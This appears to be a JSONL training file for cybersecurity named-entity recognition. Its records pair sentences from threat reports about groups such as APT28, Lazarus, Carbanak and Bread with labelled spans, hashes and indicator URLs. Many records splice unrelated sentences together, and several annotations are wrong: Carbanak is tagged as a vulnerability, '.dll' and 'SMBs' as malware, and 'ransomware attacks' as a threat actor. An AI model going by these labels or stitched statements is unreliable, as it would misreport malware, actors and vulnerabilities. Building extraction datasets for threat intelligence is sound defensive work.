{"text": "The Trojan ’ s assets folder contained the file data.db with a list of possible values for the User-Agent field for the PAGE command ( which downloads the specified webpage ) . Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll ) Just last week Lazarus were found stealing millions from ATMs across Asia and Africa .", "spans": {"TOOL: Volgmer": [[177, 184]], "MALWARE: .dll": [[276, 280]], "THREAT_ACTOR: Lazarus": [[298, 305]]}, "info": {"id": "cyberner_stix_train_000961", "source": "cyberner_stix_train"}}
{"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky .", "spans": {"ORGANIZATION: CSIS": [[50, 54]], "VULNERABILITY: Carbanak": [[88, 96]], "ORGANIZATION: customers": [[126, 135]], "VULNERABILITY: exploit": [[166, 173], [356, 363]], "MALWARE: InPage software": [[178, 193]], "ORGANIZATION: Unit42": [[248, 254]], "TOOL: InPage": [[277, 283]], "VULNERABILITY: exploits": [[284, 292]], "ORGANIZATION: Kaspersky": [[388, 397]]}, "info": {"id": "cyberner_stix_train_000962", "source": "cyberner_stix_train"}}
{"text": "We therefore believe the Dukes ’ primary mission to be so valuable to their benefactors that its continuation outweighs everything else .", "spans": {"THREAT_ACTOR: Dukes": [[25, 30]]}, "info": {"id": "cyberner_stix_train_000963", "source": "cyberner_stix_train"}}
{"text": "Downeks also has a self-update capability , if instructed by the C2 .", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: C2": [[65, 67]]}, "info": {"id": "cyberner_stix_train_000964", "source": "cyberner_stix_train"}}
{"text": "However , based on the findings shared in this report we assess with high confidence that the actor 's primary long-term mission is politically focused . Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: Dragos": [[154, 160]], "THREAT_ACTOR: XENOTIME": [[237, 245]]}, "info": {"id": "cyberner_stix_train_000965", "source": "cyberner_stix_train"}}
{"text": "MenuPass is a well-documented CN-APT group , whose roots go back to 2009 . iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 .", "spans": {"THREAT_ACTOR: MenuPass": [[0, 8]], "ORGANIZATION: iSiGHT Partners": [[75, 90]], "THREAT_ACTOR: Sandworm Team": [[103, 116]], "VULNERABILITY: zero-day": [[238, 246]], "VULNERABILITY: exploit": [[247, 254]], "VULNERABILITY: CVE-2014-4114": [[257, 270]]}, "info": {"id": "cyberner_stix_train_000966", "source": "cyberner_stix_train"}}
{"text": "campaigns involving both BokBot and TrickBot were first identified by CrowdStrike Intelligence in July 2017 . Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector .", "spans": {"TOOL: BokBot": [[25, 31]], "TOOL: TrickBot": [[36, 44]], "ORGANIZATION: CrowdStrike Intelligence": [[70, 94]], "ORGANIZATION: Group-IB": [[110, 118]], "ORGANIZATION: financial sector": [[227, 243]]}, "info": {"id": "cyberner_stix_train_000967", "source": "cyberner_stix_train"}}
{"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . Asala.mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": {"ORGANIZATION: government": [[268, 278]], "ORGANIZATION: technology related companies": [[282, 310]], "FILEPATH: Asala.mp3": [[331, 340]], "ORGANIZATION: Talos": [[363, 368]], "TOOL: Open Babel": [[399, 409]]}, "info": {"id": "cyberner_stix_train_000968", "source": "cyberner_stix_train"}}
{"text": "Here are some highlights . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network . TransFile Transfer file in or from remote host . Software developers can use coded certificates to digitally sign their software , which means any code with that signature becomes a trusted source .", "spans": {"THREAT_ACTOR: APT40": [[67, 72]], "TOOL: Gh0st RAT trojan": [[183, 199]], "ORGANIZATION: Software developers": [[300, 319]]}, "info": {"id": "cyberner_stix_train_000969", "source": "cyberner_stix_train"}}
{"text": "Reznov.dll - 17b8665cdbbb94482ca970a754d11d6e29c46af6390a2d8e8193d8d6a527dec3 Custom activity prefix com.cact.CAct Cerberus - A new banking Trojan from the underworld August 2019 In June 2019 , ThreatFabric analysts found a new Android malware , dubbed “ Cerberus ” , being rented out on underground forums . Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years . We attribute APT38 to North Korean state-sponsored operators based on a combination of technical indicators linking the activity to Pyongyang and details released by DOJ implicating North Korean national Park Jin Hyok in a criminal conspiracy .", "spans": {"MALWARE: Cerberus": [[115, 123], [255, 263]], "ORGANIZATION: ThreatFabric": [[194, 206]], "SYSTEM: Android": [[228, 235]], "THREAT_ACTOR: Machete's": [[309, 318]], "THREAT_ACTOR: APT38": [[475, 480]], "THREAT_ACTOR: operators": [[513, 522]]}, "info": {"id": "cyberner_stix_train_000970", "source": "cyberner_stix_train"}}
{"text": "The C & C server observed in this campaign is ‘ www [ . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction .", "spans": {"VULNERABILITY: Carbanak": [[131, 139]], "THREAT_ACTOR: cyber-criminal gang": [[144, 163]], "ORGANIZATION: financial institutions": [[265, 287]], "ORGANIZATION: commercial organizations": [[385, 409]], "ORGANIZATION: government organizations": [[436, 460]]}, "info": {"id": "cyberner_stix_train_000971", "source": "cyberner_stix_train"}}
{"text": "iSiGHT has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"ORGANIZATION: iSiGHT": [[0, 6]], "THREAT_ACTOR: Sandworm Team": [[19, 32]], "VULNERABILITY: zero-day exploit": [[154, 170]], "VULNERABILITY: CVE-2014-4114": [[173, 186]], "THREAT_ACTOR: PLATINUM": [[189, 197]], "ORGANIZATION: specific individuals": [[271, 291]], "VULNERABILITY: zero-day": [[332, 340]]}, "info": {"id": "cyberner_stix_train_000972", "source": "cyberner_stix_train"}}
{"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks . More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors .", "spans": {"VULNERABILITY: Flash Player exploit": [[35, 55]], "VULNERABILITY: CVE-2016-4117": [[58, 71]]}, "info": {"id": "cyberner_stix_train_000973", "source": "cyberner_stix_train"}}
{"text": "By using the login and password stolen from the browser , the Windows Trojan initiates a fake transaction while Perkele intercepts ( via the C & C server ) the mTAN sent by the bank to the user . It is not the first time Turla has used generic tools . SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c . Harrison even went after Bradshaw ’s lawyer and wife , listing them both on a website he created called Contact - a - CEO[.]com , which Harrison used to besmirch the name of major companies — including several past employers — all entities he believed had slighted him or his family in some way .", "spans": {"MALWARE: Perkele": [[112, 119]], "THREAT_ACTOR: Turla": [[221, 226]], "TOOL: generic tools": [[236, 249]], "FILEPATH: 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c": [[261, 325]], "THREAT_ACTOR: Harrison": [[328, 336]], "ORGANIZATION: Bradshaw ’s lawyer and wife": [[353, 380]]}, "info": {"id": "cyberner_stix_train_000974", "source": "cyberner_stix_train"}}
{"text": "There are no obvious links between the Eastern European and Middle Eastern targets , but it is clear that Gallmaker is specifically targeting the defense , military , and government sectors . Over the course of three years of observation of campaigns targeting civil society and human rights organizations , from records of well over two hundred spearphishing and other intrusion attempts against individuals inside of Iran and in the diaspora , a narrative of persistent intrusion efforts emerges .", "spans": {"THREAT_ACTOR: Gallmaker": [[106, 115]], "ORGANIZATION: defense": [[146, 153]], "ORGANIZATION: military": [[156, 164]], "ORGANIZATION: government sectors": [[171, 189]], "ORGANIZATION: civil society": [[261, 274]], "ORGANIZATION: human rights organizations": [[279, 305]], "ORGANIZATION: diaspora": [[435, 443]]}, "info": {"id": "cyberner_stix_train_000975", "source": "cyberner_stix_train"}}
{"text": "With default settings , SWAnalytics will scan through an Android device’s external storage , looking for directory tencent/MobileQQ/WebViewCheck” . This algorithm was previously discussed by security researchers in a Confucius-related blog post .", "spans": {"MALWARE: SWAnalytics": [[24, 35]]}, "info": {"id": "cyberner_stix_train_000976", "source": "cyberner_stix_train"}}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" . Callisto Group and related infrastructure contain links to at least Russia , Ukraine , and China .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]]}, "info": {"id": "cyberner_stix_train_000977", "source": "cyberner_stix_train"}}
{"text": "Example of traffic from an early version of Asacub ( 2015 ) The data transmitted and received is encrypted with the RC4 algorithm and encoded using the base64 standard . Through an IP address whitelisting process , the threat group selectively targets visitors to these websites . Files using simple PHP-based web shells were also used to attack systems with weak SSH and Telnet credentials . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"MALWARE: Asacub": [[44, 50]], "ORGANIZATION: CrowdStrike researchers": [[393, 416]], "ORGANIZATION: Exchange systems": [[457, 473]]}, "info": {"id": "cyberner_stix_train_000978", "source": "cyberner_stix_train"}}
{"text": "However , Earworm also appears to conduct separate operations from APT28 and thus Symantec tracks them as a distinct group .", "spans": {"THREAT_ACTOR: Earworm": [[10, 17]], "THREAT_ACTOR: APT28": [[67, 72]], "ORGANIZATION: Symantec": [[82, 90]]}, "info": {"id": "cyberner_stix_train_000979", "source": "cyberner_stix_train"}}
{"text": "Over the year , the number of mobile malware modifications designed for phishing , the theft of credit card information and money increased by a factor of 19.7 . Emissary Panda is still active and continues to target selected organisations . This campaign of the Winnti Group against Hong Kong universities was taking place in the context of Hong Kong facing civic protests that started in June 2019 triggered by an extradition bill . For example , the report shows that the US shouldered a hefty 43 percent of all global attacks and that ransomware attacks in France nearly doubled in the last five months .", "spans": {"THREAT_ACTOR: Winnti Group": [[263, 275]], "THREAT_ACTOR: ransomware attacks": [[539, 557]]}, "info": {"id": "cyberner_stix_train_000980", "source": "cyberner_stix_train"}}
{"text": "TG-3390 actors use command and control ( C2 ) domains for extended periods of time but frequently change the domains' IP addresses .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "TOOL: command and control": [[19, 38]], "TOOL: C2": [[41, 43]]}, "info": {"id": "cyberner_stix_train_000981", "source": "cyberner_stix_train"}}
{"text": "iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . There were traces of HyperBro in the infected data center from mid-November 2017 .", "spans": {"ORGANIZATION: iSiGHT Partners": [[0, 15]], "THREAT_ACTOR: Sandworm Team": [[28, 41]], "VULNERABILITY: zero-day exploit": [[163, 179]], "VULNERABILITY: CVE-2014-4114": [[182, 195]], "MALWARE: HyperBro": [[219, 227]]}, "info": {"id": "cyberner_stix_train_000982", "source": "cyberner_stix_train"}}
{"text": "All of the most recent versions of EventBot contain a ChaCha20 library that can improve performance when compared to other algorithms like RC4 and AES . According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia . We believe recent activity targeting private interests in Vietnam suggests that APT32 poses a threat to companies doing business or preparing to invest in the country .", "spans": {"MALWARE: EventBot": [[35, 43]], "SYSTEM: ChaCha20": [[54, 62]], "MALWARE: Okrum": [[182, 187]], "THREAT_ACTOR: APT32": [[427, 432]]}, "info": {"id": "cyberner_stix_train_000983", "source": "cyberner_stix_train"}}
{"text": "Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . Our experts have found that cybercriminals are actively focusing on SMBs , and giving particular attention to accountants .", "spans": {"ORGANIZATION: bank": [[105, 109]], "MALWARE: SMBs": [[225, 229]], "ORGANIZATION: accountants": [[267, 278]]}, "info": {"id": "cyberner_stix_train_000984", "source": "cyberner_stix_train"}}
{"text": "The GandCrab author also had a spat with South Korean security vendor AhnLab last summer after the security firm released a vaccine for the GandCrab ransomware . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": {"TOOL: GandCrab": [[4, 12]], "ORGANIZATION: AhnLab": [[70, 76]], "ORGANIZATION: security firm": [[99, 112]], "TOOL: GandCrab ransomware": [[140, 159]], "THREAT_ACTOR: Sima": [[180, 184]]}, "info": {"id": "cyberner_stix_train_000985", "source": "cyberner_stix_train"}}
{"text": "And others have all malicious content removed , except for log comments referencing the payment process . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world . I have the same machine infected with two different version of ZxShell . As opposed to the PowerPoint documents that did not display any slides in our testing environments , all Excel documents display legitimate - looking documents related to the targeted military organizations , or generic descriptions on how to enable VBA macro functionality in Excel .", "spans": {"THREAT_ACTOR: Barium": [[106, 112]], "ORGANIZATION: Microsoft customers": [[126, 145]], "MALWARE: ZxShell": [[271, 278]], "TOOL: VBA macro": [[531, 540]]}, "info": {"id": "cyberner_stix_train_000986", "source": "cyberner_stix_train"}}
{"text": "We found nine additional samples sharing the imphash values for the two executables , C66F88D2D76D79210D568D7AD7896B45 and DCF3AA484253068D8833C7C5B019B07 .", "spans": {"FILEPATH: C66F88D2D76D79210D568D7AD7896B45": [[86, 118]], "FILEPATH: DCF3AA484253068D8833C7C5B019B07": [[123, 154]]}, "info": {"id": "cyberner_stix_train_000987", "source": "cyberner_stix_train"}}
{"text": "The C2 address , as stored in samples we ’ ve seen , comprise both an IP address and port number ; So far , all the samples we ’ ve tested attempted to contact an IP address on port 7878/tcp . Over time these malware similarities diverged , as did targeting , intended outcomes , and TTPs , almost certainly indicating that TEMP.Hermit activity is made up of multiple operational groups primarily linked together with shared malware development resources and North Korean state sponsorship . Instead , If you followed Cybersecurity and Infrastructure Security Agency CISA alerts on ransomware for the year , you would have noted malicious activity attributed to many ransomware variants .", "spans": {"THREAT_ACTOR: operational groups": [[368, 386]], "ORGANIZATION: Cybersecurity and Infrastructure Security Agency CISA": [[518, 571]], "MALWARE: ransomware variants": [[667, 686]]}, "info": {"id": "cyberner_stix_train_000988", "source": "cyberner_stix_train"}}
{"text": "In March , it peaked at 1,169 infections . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot . The malware author has a curious sense of humor . Ways our customers can detect and block this threat are listed below .", "spans": {"TOOL: ThreeDollars": [[80, 92]], "MALWARE: preparation.dot": [[152, 167]]}, "info": {"id": "cyberner_stix_train_000989", "source": "cyberner_stix_train"}}
{"text": "Shellcode downloads and runs executable payload .", "spans": {"TOOL: Shellcode": [[0, 9]]}, "info": {"id": "cyberner_stix_train_000990", "source": "cyberner_stix_train"}}
{"text": "At the same time , it hides an icon and starts background services to hide further actions from the user . Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets , and lacks advanced offensive technology development capabilities . The White Company is a likely state-sponsored threat actor with advanced capabilities .", "spans": {"THREAT_ACTOR: NewsBeef": [[132, 140]], "THREAT_ACTOR: The White Company": [[289, 306]]}, "info": {"id": "cyberner_stix_train_000991", "source": "cyberner_stix_train"}}
{"text": "] com/ hxxp : //apple-icloud [ . After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests . When there are no more bytes to send, a hardcoded file end marker COCTabCOCT is sent in the data section and the send loop will be . Leveraging this access , an attacker can send remote commands to affect the actuation of power line switches and circuit breakers to cause power disruption .", "spans": {"THREAT_ACTOR: APT28": [[76, 81]]}, "info": {"id": "cyberner_stix_train_000992", "source": "cyberner_stix_train"}}
{"text": "The additional commands that attackers can carry out via a socket connection ( top ) and the key used to encrypt the stolen data ( bottom ) Correlating Bouncing Golf 's Activities We monitored Bouncing Golf ’ s C & C-related activities and saw that the campaign has affected more than 660 devices as of this writing . The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes . Even though we have been able to retrieve four different modules , it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim’s workstation . It contains features such as having the victim ’s email address pre - filled and displaying their appropriate company logo and background image , extracted from the target organization ’s real Microsoft 365 login page .", "spans": {"MALWARE: Bouncing Golf": [[152, 165], [193, 206]], "VULNERABILITY: CVE-2016-4117": [[386, 399]], "THREAT_ACTOR: FIN7": [[522, 526]]}, "info": {"id": "cyberner_stix_train_000993", "source": "cyberner_stix_train"}}
{"text": "This DealersChoice Flash object shares a similar process to previous variants ; however , it appears that the Sofacy actors have made slight changes to its internal code .", "spans": {"TOOL: DealersChoice": [[5, 18]], "TOOL: Flash": [[19, 24]], "THREAT_ACTOR: Sofacy": [[110, 116]]}, "info": {"id": "cyberner_stix_train_000994", "source": "cyberner_stix_train"}}
{"text": "Intelligence collection directed by nation state actors against US political targets provides invaluable insight into the requirements directed upon those actors .", "spans": {}, "info": {"id": "cyberner_stix_train_000995", "source": "cyberner_stix_train"}}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . Since 2011 , the robbers had allegedly been stealing money directly from bank accounts in Russia and other countries of the Commonwealth of Independent States ( CIS ) by using a Trojan called Lurk .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: Trojan": [[308, 314]], "MALWARE: Lurk": [[322, 326]]}, "info": {"id": "cyberner_stix_train_000996", "source": "cyberner_stix_train"}}
{"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server . In May 2018 , Trend Micro found a new sample ( Detected as W2KM_DLOADR.UHAOEEN ) that may be related to this campaign .", "spans": {"MALWARE: GoogleUpdate.exe": [[4, 20]], "ORGANIZATION: Trend Micro": [[107, 118]], "MALWARE: W2KM_DLOADR.UHAOEEN": [[152, 171]]}, "info": {"id": "cyberner_stix_train_000997", "source": "cyberner_stix_train"}}
{"text": "The nine stolen certificates originated from nine different companies who are physically located close together around the central districts of Seoul , South Korea .", "spans": {}, "info": {"id": "cyberner_stix_train_000998", "source": "cyberner_stix_train"}}
{"text": "TG-3390 uses the PlugX remote access tool .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "MALWARE: PlugX": [[17, 22]]}, "info": {"id": "cyberner_stix_train_000999", "source": "cyberner_stix_train"}}
{"text": "Also , in some versions of the Trojan the file names were random strings of characters . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 .", "spans": {"TOOL: DropIt sample": [[117, 130]], "MALWARE: %TEMP%\\flash_update.exe": [[268, 291]], "TOOL: Flash Player installer": [[316, 338]], "MALWARE: WannaCry": [[413, 421]]}, "info": {"id": "cyberner_stix_train_001000", "source": "cyberner_stix_train"}}
{"text": "The C & C server IP addresses used also appear to be disparate , as they were located in many European countries like Russia , France , Holland , and Germany . Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April . A few days after the tweet , in January 2019 , the operators changed their landing page in order to prevent this type of tracking against their infrastructure . Greatness is specifically designed to work in a standardized way so that the experience is the same for each customer who buys into the service , potentially allowing anyone with a moderate amount of technical ability to carry out advanced , convincing phishing attacks .", "spans": {"ORGANIZATION: Kaspersky": [[160, 169]], "THREAT_ACTOR: ScarCruft": [[186, 195]], "VULNERABILITY: zero-day": [[225, 233]], "VULNERABILITY: CVE-2016-0147": [[236, 249]], "THREAT_ACTOR: advanced , convincing phishing attacks": [[719, 757]]}, "info": {"id": "cyberner_stix_train_001001", "source": "cyberner_stix_train"}}
{"text": "Known CozyDuke modules include : Command execution module for executing arbitrary Windows Command Prompt commands , Password stealer module , NT LAN Manager ( NTLM ) hash stealer module , System information gathering module , Screenshot module .", "spans": {"MALWARE: CozyDuke": [[6, 14]], "SYSTEM: Windows": [[82, 89]], "TOOL: Command Prompt": [[90, 104]], "TOOL: Password stealer": [[116, 132]], "TOOL: NT LAN Manager": [[142, 156]], "TOOL: NTLM": [[159, 163]], "TOOL: hash stealer": [[166, 178]]}, "info": {"id": "cyberner_stix_train_001002", "source": "cyberner_stix_train"}}
{"text": "This sort of functionality is more common in criminality-oriented botnets , not statesponsored targeted attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_001003", "source": "cyberner_stix_train"}}
{"text": "We first started tracking Bread ( also known as Joker ) in early 2017 , identifying apps designed solely for SMS fraud . A current round of cyber-attacks from Chinese source groups are targeting the maritime sector in an attempt to steal technology . The command processing function starts by substituting the main module name and path in the hosting process PEB , with the one of the default internet browser . The attacks that Anonymous Sudan has claimed in support of KillNet , both before and after it officially joined the collective , have broadened the geographic scope of its targeting to include entities elsewhere in Europe and the U.S. ; it has since continued to expand the scope of its targeting further afield to include countries such as Israel and Ethiopia .", "spans": {"MALWARE: Bread": [[26, 31]], "MALWARE: Joker": [[48, 53]], "ORGANIZATION: maritime sector": [[199, 214]]}, "info": {"id": "cyberner_stix_train_001004", "source": "cyberner_stix_train"}}
{"text": "The WIZARD SPIDER threat group , known as the Russia-based operator of the TrickBot banking malware , had focused primarily on wire fraud in the past . This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": {"THREAT_ACTOR: WIZARD SPIDER threat group": [[4, 30]], "TOOL: TrickBot banking malware": [[75, 99]]}, "info": {"id": "cyberner_stix_train_001005", "source": "cyberner_stix_train"}}
{"text": "The code for downloading and executing the next stage malware .", "spans": {}, "info": {"id": "cyberner_stix_train_001006", "source": "cyberner_stix_train"}}
{"text": "Allows applications to change network connectivity state . The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware . DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016 .", "spans": {"THREAT_ACTOR: CIA": [[63, 66]], "THREAT_ACTOR: DarkHydrus": [[168, 178]]}, "info": {"id": "cyberner_stix_train_001007", "source": "cyberner_stix_train"}}
{"text": "TL ; DR Google Play Protect detected and removed 1.7k unique Bread apps from the Play Store before ever being downloaded by users Bread apps originally performed SMS fraud , but have largely abandoned this for WAP billing following the introduction of new Play policies restricting use of the SEND_SMS permission and increased coverage by Google Play Protect More information on stats and relative impact is available in the Android Security 2018 Year in Review report BILLING FRAUD Bread apps typically fall into two categories : SMS fraud ( older versions ) and toll fraud ( newer versions ) . Dragos does not corroborate nor conduct political attribution to threat activity . The command processing is straightforward . Subsequently , KillNet claimed to have compromised NATO ’s training site , Joint Advanced Distributed Learning , and published dozens of purportedly leaked images on its channels .", "spans": {"SYSTEM: Google Play Protect": [[8, 27], [339, 358]], "MALWARE: Bread": [[61, 66], [130, 135], [483, 488]], "SYSTEM: Play Store": [[81, 91]], "SYSTEM: Play": [[256, 260]], "SYSTEM: Android": [[425, 432]], "ORGANIZATION: Dragos": [[596, 602]], "SYSTEM: NATO ’s training site": [[774, 795]]}, "info": {"id": "cyberner_stix_train_001008", "source": "cyberner_stix_train"}}
{"text": "The commands available are located in one of the configuration blobs mentioned earlier .", "spans": {}, "info": {"id": "cyberner_stix_train_001009", "source": "cyberner_stix_train"}}
{"text": "In the next sections , for simplicity , we will continue the analysis only on the 64-bit payload . Ties to SHAPESHIFT suggest that APT33 may engage in destructive operations or shares tools or development resources with an Iranian threat group that conducts destructive operations . On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B . This then offered a means to log on using email providers , which could then capture the passwords and user names .", "spans": {"TOOL: SHAPESHIFT": [[107, 117]], "THREAT_ACTOR: APT33": [[131, 136]], "THREAT_ACTOR: threat group": [[231, 243]]}, "info": {"id": "cyberner_stix_train_001010", "source": "cyberner_stix_train"}}
{"text": "In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . If a target of the spear phishing described in \" Phase 2 : malware deployment \" opened the email attachment and , crucially , clicked on the icon in the attachment , this would lead to the target 's computer becoming infected with the \" Scout \" malware tool from the RCS Galileo platform .", "spans": {"THREAT_ACTOR: APT32": [[10, 15]], "MALWARE: Vietnam.exe": [[114, 125]], "ORGANIZATION: diaspora": [[185, 193]], "MALWARE: Scout": [[451, 456]]}, "info": {"id": "cyberner_stix_train_001011", "source": "cyberner_stix_train"}}
{"text": "PROMETHIUM is an activity group that has been active as early as 2012 . Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: activity group": [[17, 31]], "ORGANIZATION: Kaspersky Security Network": [[82, 108]], "ORGANIZATION: KSN": [[111, 114]]}, "info": {"id": "cyberner_stix_train_001012", "source": "cyberner_stix_train"}}
{"text": "The group runs custom batch scripts to collect specific file types and takes proactive steps to minimize detection of its activities .", "spans": {}, "info": {"id": "cyberner_stix_train_001013", "source": "cyberner_stix_train"}}
{"text": "This alert contains indicators of compromise ( IOCs ) , malware descriptions , network signatures , and host-based rules to help network defenders detect activity conducted by the North Korean B-IDTY E-LOC government .", "spans": {"TOOL: indicators of compromise": [[20, 44]], "TOOL: IOCs": [[47, 51]]}, "info": {"id": "cyberner_stix_train_001014", "source": "cyberner_stix_train"}}
{"text": "The trojan uses the Android Accessibility API to intercept all interactions between the user and the mobile device . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well . ShadowHammer : https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip . Threat actors typically register and use several domains in order to discretely lead their malware to their Command and Control ( C&C ) servers .", "spans": {"SYSTEM: Android Accessibility": [[20, 41]], "THREAT_ACTOR: ShadowHammer": [[264, 276]], "URL: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip": [[279, 373]], "SYSTEM: several domains": [[417, 432]]}, "info": {"id": "cyberner_stix_train_001015", "source": "cyberner_stix_train"}}
{"text": "The short links in the spearphishing emails redirected victims to a TG-4127 controlled URL that spoofed a legitimate Google domain .", "spans": {"TOOL: emails": [[37, 43]], "THREAT_ACTOR: TG-4127": [[68, 75]], "ORGANIZATION: Google": [[117, 123]]}, "info": {"id": "cyberner_stix_train_001016", "source": "cyberner_stix_train"}}
{"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka . These samples appeared to have been created by OilRig during their development and testing activities , all of which share many similarities with the delivery document used in the recent OilRig attack against a Middle Eastern government , N56.15.doc ( 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00 ) that we have also included in Table 1 .", "spans": {"MALWARE: Silence.ProxyBot": [[19, 35]], "THREAT_ACTOR: OilRig": [[183, 189]], "THREAT_ACTOR: OilRig attack": [[323, 336]], "ORGANIZATION: government": [[362, 372]], "FILEPATH: N56.15.doc": [[375, 385]], "FILEPATH: 7cbad6b3f505a199d6766a86b41ed23786bbb99dab9cae6c18936afdc2512f00": [[388, 452]]}, "info": {"id": "cyberner_stix_train_001017", "source": "cyberner_stix_train"}}
{"text": "In the image below , we can see a packet that was sent to the attacker ’ s C & C containing collected information along with stolen SMS data . PLATINUM uses a number of different custom-developed backdoors to communicate with infected computers . First identified in January 2015 , Orangeworm has also conducted targeted attacks against organizations in related industries as part of a larger supply-chain attack in order to reach their intended victims .", "spans": {"THREAT_ACTOR: PLATINUM": [[143, 151]], "TOOL: custom-developed backdoors": [[179, 205]]}, "info": {"id": "cyberner_stix_train_001018", "source": "cyberner_stix_train"}}
{"text": "The OwaAuth web shell is likely created with a builder , given that the PE compile time of the binary does not change between instances and the configuration fields are padded to a specific size .", "spans": {"MALWARE: OwaAuth": [[4, 11]], "TOOL: web shell": [[12, 21]], "TOOL: PE": [[72, 74]]}, "info": {"id": "cyberner_stix_train_001019", "source": "cyberner_stix_train"}}
{"text": "After decompiling the sample , we were able to document the modifications from the open-source Quasar .", "spans": {"MALWARE: Quasar": [[95, 101]]}, "info": {"id": "cyberner_stix_train_001020", "source": "cyberner_stix_train"}}
{"text": "Allows an application to read or write the system settings . The attack against Samsung smart TVs was developed in cooperation with the United Kingdom's MI5/BTSS . FIN8 is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail , restaurant , and hospitality industries .", "spans": {"ORGANIZATION: Samsung smart TVs": [[80, 97]], "THREAT_ACTOR: MI5/BTSS": [[153, 161]], "THREAT_ACTOR: FIN8": [[164, 168]]}, "info": {"id": "cyberner_stix_train_001021", "source": "cyberner_stix_train"}}
